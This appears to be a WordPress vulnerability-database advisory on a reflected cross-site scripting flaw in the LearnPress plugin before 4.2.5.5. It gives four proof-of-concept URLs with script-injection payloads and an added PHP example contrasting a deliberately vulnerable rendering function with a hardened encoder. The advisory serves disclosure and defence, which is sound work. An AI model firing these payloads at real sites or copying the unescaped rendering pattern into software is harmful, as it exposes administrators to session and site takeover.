WordPress Plugin Vulnerabilities
LearnPress < 4.2.5.5 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape user input before outputting it back in the page, leading to Reflected Cross-Site Scripting, which could be used against high-privilege users such as admins.
Proof of Concept
Make a logged-in admin open:

v < 4.2.5.2 - https://example.com/?param=value"}';alert(document.domain)<!--

v < 4.2.5.3 - https://example.com/?param=value"}';alert(document.domain);b='

v < 4.2.5.4 - https://example.com/?'-alert(`XSS`)-'=a

v < 4.2.5.5 - https://example.com/instructors/?param=value%26%23x3C%3B%2Fscript%26%23x3E%3B%26%23x3C%3Bscript%26%23x3E%3Balert%26%23x60%3BXSS%26%23x60%3B%26%23x3C%3B%2Fscript%26%23x3E%3B
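The four proof-of-concept inputs above, run through an output encoder, as an added example that is not LearnPress code. It assumes the reflected query data ends up inside an inline script as a quoted JavaScript string, which the payload shapes suggest but the advisory does not state; render_vulnerable, render_hardened, body and lpArgs are hypothetical names.

```php
<?php
// Added example, not plugin code. Inputs are the decoded PoC query strings.
$samples = [
    ['param' => 'value"}\';alert(document.domain)<!--'],
    ['param' => 'value"}\';alert(document.domain);b=\''],
    ['\'-alert(`XSS`)-\'' => 'a'],   // payload carried in the parameter *name*
    ['param' => '&#x3C;/script&#x3E;&#x3C;script&#x3E;alert&#x60;XSS&#x60;&#x3C;/script&#x3E;'],
];

// Hypothetical vulnerable shape: request data pasted into a single-quoted JS string.
function render_vulnerable(array $query): string {
    $pairs = [];
    foreach ($query as $k => $v) {
        $pairs[] = '"' . $k . '":"' . $v . '"';   // neither key nor value is encoded
    }
    return "<script>var lpArgs = '{" . implode(',', $pairs) . "}';</script>";
}

// Hardened: keys and values are encoded together, as the last step before output.
// The HEX flags turn ' " < > & into \uXXXX escapes, so the data can neither end
// the string literal nor close the script element. Nothing decodes it afterwards.
function render_hardened(array $query): string {
    $flags = JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_THROW_ON_ERROR;
    return '<script>var lpArgs = ' . json_encode($query, $flags) . ';</script>';
}

// Text between the opening and closing script tags.
function body(string $html): string {
    return substr($html, strlen('<script>'), -strlen('</script>'));
}

foreach ($samples as $i => $query) {
    $bad  = body(render_vulnerable($query));
    $good = body(render_hardened($query));
    // More than the two wrapper quotes means the data closed the string early.
    // Sample 4 stays inert in this shape; it only matters if the server decodes
    // HTML entities after filtering, which encode-last rules out.
    $breakout = substr_count($bad, "'") > 2;
    $clean    = strpbrk($good, "'<>&") === false;
    printf("sample %d: breakout in vulnerable=%s, hardened clean=%s\n",
        $i + 1, $breakout ? 'yes' : 'no', $clean ? 'yes' : 'no');
    echo '  ', $good, "\n";
}
```

In WordPress code the same flags can be passed to `wp_json_encode()`.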
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Vitor Pacheco
Submitter
Vitor Pacheco
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-11-17 (about 5 months ago)
Added
2023-11-17 (about 5 months ago)
Last Updated
2024-01-08 (about 4 months ago)